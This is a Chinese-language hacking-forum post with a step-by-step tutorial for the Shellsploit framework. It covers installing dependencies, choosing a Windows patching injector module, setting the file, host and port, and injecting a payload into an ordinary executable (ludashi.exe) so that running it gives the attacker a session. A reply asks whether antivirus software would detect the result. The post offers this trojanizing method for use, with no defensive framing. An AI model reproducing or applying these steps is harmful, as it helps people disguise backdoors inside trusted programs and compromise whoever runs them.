搜索
查看: 9063|回复: 1

给正常exe文件注入shell

[复制链接]

152

主题

99

回帖

540

积分

高级会员

中国黑客

积分
540
QQ
发表于 2018-11-15 15:24:39 | 显示全部楼层 |阅读模式 来自 甘肃
Shellsploit让您为各种操作系统生成自定义的shellcode,后门,注入器。让我们通过编码器对每个字节进行混淆。

安装


[pre]
依赖安装
root$ sudo pip install capstone
root$ sudo pip install readline(Not necessary for windows coz preinstalled in shellsploit)
root$ sudo pip install pefile
root$ sudo pip install colorama
root$ sudo pip install pylzma
安装
Pip在windows/nix机器上都没有问题安装命令如下:
root$ python setup.py –s/ –setup install
root$ chmod +x shellsploit (if you are using windows just pass this step)
root$ ./shellsploit
[/pre]

1.使用shellsploit可以看到运行界面,其实使用方法和msf类似,差不多!

2.injectors注入模块
[pre]
ssf> show injectors
[/pre]

3.使用injectors模块其中一个

[pre]
ssf>use injectors/Windows/BFD/Patching
[/pre]

4.查看下他里面有什么选项(其实和msf设置方法差不多)


[pre]
ssf:injectors/Windows/BFD/Patching > show options
[/pre]

剩下的设置file 、host、port 这些选择,进行一些设置,其中的file选择我已经将模板放到了目录当中。



进行Payload注入,注入后的模板放入到了—File /root/shellsploit-framework/704125575/ludashi.exe
[pre]
ssf:injectors/Windows/BFD/Patching > inject
[/pre]

8.打开payload得到会话

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

×
谁有敬业福啊!
回复

使用道具 举报

0

主题

13

回帖

15

积分

新手开车

积分
15

活跃会员

发表于 2018-11-23 11:15:13 | 显示全部楼层 来自 山东青岛
这样做会不会被杀
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表